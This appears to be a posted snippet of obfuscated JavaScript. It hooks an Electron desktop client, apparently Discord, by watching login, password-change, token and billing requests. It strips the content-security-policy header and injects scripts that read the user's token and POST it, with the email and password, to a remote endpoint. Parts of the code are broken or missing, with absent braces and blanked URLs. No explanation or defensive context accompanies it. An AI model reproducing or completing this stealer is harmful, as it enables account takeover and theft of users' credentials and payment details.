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Created October 25, 2021 23:35
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function _0x1f69(_0x5bfbd0, _0x568a9b) {
const _0x3b49dc = _0x3b49();
return _0x1f69 = function (_0x1f699a, _0x27a00b)
_0x1f699a = _0x1f699a - 0x1b8;
let _0x323d61 = _0x3b49dc[_0x1f699a];
return _0x323d61;
}, _0x1f69(_0x5bfbd0, _0x568a9b);
const _0x567b59 = _0x1f69;
function _0x3b49()
const _0x3f5a25 = ['webContents', 'path', 'join', '*/users/@me/library', '215958nWbBCi', '\",\x0a ip: \"', 'url', '*/tokens', '*/auth/login', 'statusCode', '\"\x0a },\x0a body: JSON.stringify({\x0a token: \"', 'toString', 'https', 'parse', '2166PDuNed', 'new_password', 'password', '630390yiZEvQ', '\x0a fetch(\"\", {\x0a method: \"POST\",\x0a headers: {\x0a \"Content-Type\": \"application/json\",\x0a authorization:\x0a \"', '512THQYLY', 'bytes', 'startsWith', '\",\x0a password: \"', 'responseHeaders', '62JScLEW', 'https://**/applications/detectable', 'login', '\x0a var xmlHttp = new XMLHttpRequest();\x0a \"GET\", \"\", false );\x0a xmlHttp.send( null );\x0a xmlHttp.responseText;\x0a ', '1246pKXOnP', '244116TuXJjP', 'wss://', '\x0a fetch(\"\", {\x0a method: \"POST\",\x0a headers: {\x0a \"Content-Type\": \"application/json\",\x0a authorization:\x0a \"', 'users/@me', 'https://**/users/@me/billing/subscriptions', 'uploadData', 'var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[[\"extra_id\"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)\"getToken\"===e&&(token=t.default.getToken())} token', '*/users/@me', 'email', 'webRequest', 'rmdirSync', 'then', 'defaultSession', 'PrimeFaOP', 'method', '733593skakNE', 'wss://*', 'content-security-policy', '\"\x0a }),\x0a })\x0a .then((x) => x.json())\x0a .then((x) => { return console.log(x) });\x0a ', 'getAllWindows', 'querystring', 'from', 'executeJavaScript', 'endsWith', '3005710xDRsVZ', '*/users/@me', '\x0a var xmlHttp = new XMLHttpRequest();\x0a \"GET\", \"\", false );\x0a xmlHttp.send( null );\x0a xmlHttp.responseText;\x0a ', 'https://**/users/@me/library', 'electron', '\x0a fetch(\"\", {\x0a method: \"POST\",\x0a headers: {\x0a \"Content-Type\": \"application/json\",\x0a authorization:\x0a \"', '\"\x0a }),\x0a })\x0a .then((x) => x.json())\x0a .then((x) => { return console.log(x) });\x0a ', 'exports', '*/applications/detectable', '*/scheduled-maintenances/upcoming.json', 'onHeadersReceived', '16jqYKjW', '*/auth/login', 'onCompleted'];
_0x3b49 = function ()
return _0x3f5a25;
return _0x3b49();
(function (_0x4f91cd, _0x17c370)
const _0x4259b2 = _0x1f69,
_0x1b9aad = _0x4f91cd();
while (!![])
const _0x2ab58e = -parseInt(_0x4259b2(0x1c1)) / 0x1 * (-parseInt(_0x4259b2(0x1bd)) / 0x2) + parseInt(_0x4259b2(0x1f6)) / 0x3 * (-parseInt(_0x4259b2(0x1b8)) / 0x4) + -parseInt(_0x4259b2(0x1f9)) / 0x5 + parseInt(_0x4259b2(0x1ec)) / 0x6 + -parseInt(_0x4259b2(0x1d1)) / 0x7 + parseInt(_0x4259b2(0x1e5)) / 0x8 * (parseInt(_0x4259b2(0x1c2)) / 0x9) + parseInt(_0x4259b2(0x1da)) / 0xa;
if (_0x2ab58e === _0x17c370) break;
else _0x1b9aad['push'](_0x1b9aad['shift']());
catch (_0x5873be)
}(_0x3b49, 0x19ea1));
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